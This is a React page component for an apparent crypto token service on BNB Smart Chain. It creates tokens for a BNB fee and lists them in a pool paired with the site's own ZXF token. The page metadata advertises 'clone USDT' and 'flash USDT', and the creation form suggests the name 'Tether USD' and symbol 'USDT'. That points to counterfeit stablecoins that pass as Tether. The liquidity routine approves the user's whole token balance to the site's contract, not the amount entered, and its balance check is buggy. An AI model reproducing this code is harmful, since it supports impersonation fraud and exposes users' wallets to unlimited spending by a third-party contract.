import React from "react";
import { useEffect, useState } from 'react';
import PageLayout from "../../layouts/PageLayout";
import { DivideTitle } from "../../components";
import { Row, Col } from "react-bootstrap";
import { CardHeader, CardLayout } from "../../components/cards";
import { LabelField } from "../../components/fields";
import { Box, Image, List, Text, Item, Anchor, Button, Heading } from "../../components/elements";
import { BrowserProvider, Contract, parseUnits, formatUnits, formatEther, JsonRpcProvider } from 'ethers';
import { createWeb3Modal, defaultConfig, useWeb3Modal, useWeb3ModalAccount, useWeb3ModalProvider, useSwitchNetwork } from '@web3modal/ethers/react';
import detectEthereumProvider from '@metamask/detect-provider';
import { useNavigate } from "react-router-dom";
import { Helmet } from "react-helmet-async";
import ERC20ABI from './ERC20ABI.json';

export default function AddLiquidity() {

    const contractAddress = "0x3Ab6a1bA8EC0052F5642f4aA8215a33abC868377";
    const abi = [{"inputs":[{"internalType":"address","name":"_ZXF","type":"address"},{"internalType":"address","name":"_poolManager","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ZXF","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"uint8","name":"tokenDecimals","type":"uint8"},{"internalType":"uint256","name":"priceInZXF","type":"uint256"},{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"createPoolAndAddLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes","name":"","type":"bytes"}],"name":"lockAcquired","outputs":[{"internalType":"bytes","name":"","type":"bytes"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"poolManager","outputs":[{"internalType":"contract IPoolManagerExtended","name":"","type":"address"}],"stateMutability":"view","type":"function"}];
    const fee = "71000000000000000";

    const tokenCreator = "0x120CE714eBB9df6bfd6F2424e3c6b8BaCFC27786";
    const abiToken = [{"constant":false,"inputs":[{"internalType":"address","name":"cOwner","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"uint256","name":"totalSupply","type":"uint256"}],"name":"createToken","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address payable","name":"_theOwner","type":"address"},{"internalType":"uint256","name":"fee","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"constant":false,"inputs":[{"internalType":"address payable","name":"beneficiary","type":"address"}],"name":"withdrawEther","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getNewToken","outputs":[{"internalType":"contract TOKEN","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"newToken","outputs":[{"internalType":"contract TOKEN","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"theOwner","outputs":[{"internalType":"address payable","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"}];
    const feeToken = "20000000000000000";

    let myNewContract = "";
    let tempNewContract = "";
    const navigate = useNavigate();

    // 4. Use modal hook
  const { open } = useWeb3Modal();
  const { address, chainId, isConnected } = useWeb3ModalAccount();
  const { walletProvider } = useWeb3ModalProvider();
  const { switchNetwork } = useSwitchNetwork();

    const [tokenContract, setTokenContract] = useState(null);
    const [tokenDecimals, setTokenDecimals] = useState(18);
    const [priceText, setPriceText] = useState(0.01);
    const [tokenAmount, setTokenAmount] = useState(null);
    const [isLoading, setIsLoading] = useState(false);
    const [createButtonText, setCreateButtonText] = useState("Create Liquidity");
    const [createButtonIcon, setCreateButtonIcon] = useState("add");
    const [createButtonColor, setCreateButtonColor] = useState("mc-btn green m-2");
    const [nameText, setNameText] = useState(null);
    const [symbolText, setSymbolText] = useState(null);
    const [supplyText, setSupplyText] = useState(null);
    const [ownerText, setOwnerText] = useState(null);

    // const swapContract = "0x4C5868093bc838A9F34b16b8223789E4eaEE1dB3";

    const handleNameChange = (event) => {
        setNameText(event.target.value);
      };

      const handleSymbolChange = (event) => {
        setSymbolText(event.target.value);
      };

      const handleSupplyChange = (event) => {
        setSupplyText(event.target.value);
      };

      const handleOwnerChange = (event) => {
        setOwnerText(event.target.value);
      };


      const handleTokenDecimals = (event) => {
        setTokenDecimals(event.target.value);
      };

      const handleWalletChange = (event) => {
        setTokenContract(event.target.value);
      };

      const handlePriceChange = (event) => {
        setPriceText(event.target.value);
      };

      const handleTokenAmount = (event) => {
        setTokenAmount(event.target.value);
      };

      const connectWalletButton = () => {
        return (
          <Button onClick={() => open()} icon="wallet" text="Wallet Connect" className="mc-btn primary m-2" />
        )
      }

      const createButton = () => {
        return (
          <Button onClick={createNewContract} icon={createButtonIcon} text={createButtonText} className={createButtonColor} disabled={isLoading} />
        )
      }

      const createTokenButton = () => {
        return (
          <Button onClick={createToken} icon="add" text="Create Token" className="mc-btn green m-2" />
        )
      }


      useEffect(() => {

      }, [])

      function timeout() {
        return new Promise( res => setTimeout(res, 5000) );
      }

      const createNewContract = async() => {
        if(chainId != 56){
            alert("Please switch your wallet network to BNB Smart Chain");
            switchNetwork(56);
            return;
        }

        try{
          if(isConnected){
            const provider = new BrowserProvider(walletProvider);
            const signer = await provider.getSigner();
            const contract = new Contract(contractAddress, abi, signer);
            const tokenContractApproval = new Contract(tokenContract, ERC20ABI, signer);


            // Get the Token balance
            const tokenBalance = new Contract(tokenContract, ERC20ABI, provider);
            const balance = await tokenBalance.balanceOf(address);
            if(formatUnits(balance, 18) < parseInt(tokenAmount,tokenDecimals)){
              alert('Not enough USDT balance in your wallet');
              return;
            };

            console.log(tokenContract);
            console.log(tokenDecimals);
            console.log(parseUnits(priceText, 18).toString());
            console.log(parseUnits(tokenAmount, 18).toString());

            // Approve USDT Transaction
            const approvalTx = await tokenContractApproval.approve(contractAddress, balance);
            await approvalTx.wait();
            console.log('Approval confirmed');

            console.log("Intialize payment");
            let newLiquidityPool = await contract.createPoolAndAddLiquidity(tokenContract, tokenDecimals, parseUnits(priceText, 18).toString(), parseUnits(tokenAmount, 18).toString());

            setIsLoading(true);
            setCreateButtonText("Please Wait...");
            setCreateButtonIcon("timer");
            setCreateButtonColor("mc-btn red m-2");

            if(newLiquidityPool){
              navigate(`/liqudity-pool?id=${tokenContract}`);
            }else{
              alert("Something wrong, Some fields missing or maybe you don't have enough BNB balance for transaction fee.");
            }
          }
        }catch(err){
          alert("Something wrong, Some fields missing or maybe you don't have enough BNB balance for transaction fee.");
          console.log(err);
        }

      }

      const createToken = async() => {
        if(chainId != 56){
            alert("Please switch your wallet network to BNB Smart Chain");
            switchNetwork(56);
            return;
        }

        try{
          if(isConnected){
            const provider = new BrowserProvider(walletProvider);
            const signer = await provider.getSigner();
            const contract = new Contract(tokenCreator, abiToken, signer);

            const bnbBalance = await provider.getBalance(address);
            if(bnbBalance <= Number(feeToken)){
              alert("Not enough BNB balance, creation fee : 0.02 BNB.");
              return;
            }

            console.log("Intialize payment");
            let createToken = await contract.createToken(ownerText, nameText, symbolText, supplyText, {value: feeToken});
            console.log(contract);
        if(createToken){
          alert("Congratulations, your stable token has been created.");
        }else{
          alert("Something wrong, Some fields missing or maybe you don't have enough BNB balance for transaction fee (fee = 0.02 BNB).");
        }
          }
        }catch(err){
        alert("Something wrong, Some fields missing or maybe you don't have enough BNB balance for transaction fee (fee = 0.02 BNB).");
          console.log(err);
        }

      }

    return (
        <PageLayout>
        <Helmet>
          <title>Uniswap Listing</title>
          <meta name="description" content="Launch your own stable token in minutes with our easy-to-use platform. Customize, deploy, and manage stablecoins backed by fiat, crypto, or algorithmic models — no coding required!" />
          <meta name="keywords" content="Uniswap Listing, clone USDT, flash USDT, stablecoin generator, token backed by USDT, crypto token maker" />
          <meta name="author" content="0xFactory" />

          {/* Open Graph (for Facebook, LinkedIn, etc.) */}
          <meta property="og:title" content="Uniswap Listing" />
          <meta property="og:description" content="Launch your own stable token in minutes with our easy-to-use platform. Customize, deploy, and manage stablecoins backed by fiat, crypto, or algorithmic models — no coding required!" />
          <meta property="og:image" content="https://i.ibb.co/DPh6j6HM/coin.png" />
          <meta property="og:url" content="https://0xfactory.com/stable-token" />
          <meta property="og:type" content="website" />

          {/* Twitter Card (for Twitter sharing) */}
          <meta name="twitter:title" content="Uniswap Listing" />
          <meta name="twitter:description" content="Launch your own stable token in minutes with our easy-to-use platform. Customize, deploy, and manage stablecoins backed by fiat, crypto, or algorithmic models — no coding required!" />
          <meta name="twitter:image" content="https://i.ibb.co/DPh6j6HM/coin.png" />
          <meta name="twitter:card" content="stable_token" />
        </Helmet>

            <Heading as="h2" className="mc-overview-title">Uniswap Listing</Heading>
            <div className="text-center"><h2>Launch your token on Uniswap with no liquidity cost</h2></div>
            <br/>
            <Row>
            <Col xl={12}>
                    <Box className="mc-card">
                        <CardHeader title="Uniswap Token Listing" />
                        <div>Supported Blockchains: BNB Smart Chain Only.</div>
                        <div>Your token will be pair with ZXF.</div>
                        <div>Enable your token community to trade effortlessly with minimal slippage.</div>
                        <div>No chart avaliable for this pool.</div>
                        <div>Note: Stable and standard tokens exchanges may experience a 0.5% to 1% deduction due to %0.3 exchange fee + uniswap & network fee.</div>
                        <div>Creation Fee: FREE</div>
                        <Row xs={12} md={12} xl={12}>
                            <Col>
                                <DivideTitle title=" " className="mb-4 mt-3" />
                                <LabelField onChange={handleWalletChange} value={tokenContract} label="Token Contract" type="text" fieldSize="w-100 h-lg" labelDir="label-col mb-4" placeholder="0xAb8a.............." />
                                <LabelField onChange={handleTokenDecimals} value={tokenDecimals} label="Token Decimal" type="text" fieldSize="w-100 h-lg" labelDir="label-col mb-4" placeholder="18" />
                                <LabelField onChange={handlePriceChange} value={priceText} label="Listing Price" type="text" fieldSize="w-100 h-lg" labelDir="label-col mb-4" placeholder="0.01" />
                                <LabelField onChange={handleTokenAmount} value={tokenAmount} label="Token Amount" type="text" fieldSize="w-100 h-lg" labelDir="label-col mb-4" placeholder="100000000" />
                            </Col>
                        </Row>
                        <br />
                        <Row xs={12} md={3} xl={3} className="justify-content-center">
                          {isConnected ? createButton() : connectWalletButton()}
                        </Row>
                    </Box>
                </Col>
            </Row>
            <br />
            <br />
            <br />
            <div className="text-center"><h2>Do you need new token?</h2></div>
            <br />
            <Row>
            <Col xl={12}>
                    <Box className="mc-card">
                        <CardHeader title="Create New Token" />
                        <div>Supported Blockchains: BNB Smart Chain Only.</div>
                        <div>Creation Fee: 0.02 BNB.</div>
                        <Row xs={12} md={12} xl={12}>
                            <Col>
                                <DivideTitle title=" " className="mb-4 mt-3" />
                                <LabelField onChange={handleNameChange} value={nameText} label="Token Name" type="text" fieldSize="w-100 h-lg" labelDir="label-col mb-4" placeholder="Tether USD" />
                                <LabelField onChange={handleSymbolChange} value={symbolText} label="Symbol" type="text" fieldSize="w-100 h-lg" labelDir="label-col mb-4" placeholder="USDT" />
                                <LabelField onChange={handleSupplyChange} value={supplyText} label="Supply" type="number" min="1" fieldSize="w-100 h-lg" labelDir="label-col mb-4" placeholder="1000000" />
                                <LabelField onChange={handleOwnerChange} value={ownerText} label="Owner Wallet" type="text" fieldSize="w-100 h-lg" labelDir="label-col mb-4" placeholder="0x............" />
                            </Col>
                        </Row>
                        <br />
                        <Row xs={12} md={3} xl={3} className="justify-content-center">
                          {isConnected ? createTokenButton() : connectWalletButton()}
                        </Row>
                    </Box>
                </Col>
            </Row>
            <br />
            <CardLayout>
                <List className="mc-notify-list">
                        <Item className="mc-notify-item" key="token">
                            <a className="mc-notify-content" href="https://t.me/mohamedmox" target="_blank">
                                <Box className="mc-notify-media">
                                    <Image src="images/help.png" alt="Contact Us" />
                                </Box>
                                <Box className="mc-notify-meta">
                                  <CardHeader title="You Need Help ?" />
                                    <Text as="span">We can create your token and uniswap listing for you.</Text>
                                    <Text as="small">Fee: $99 Only (Token + Uniswap Listing)</Text>
                                </Box>
                            </a>
                            <div>
                            <a href="https://t.me/mohamedmox" target="_blank">
                                <Button className="mc-btn green m-2">Contact Us</Button>
                            </a>
                            </div>
                        </Item>

                </List>
            </CardLayout>

        </PageLayout>
    )
}
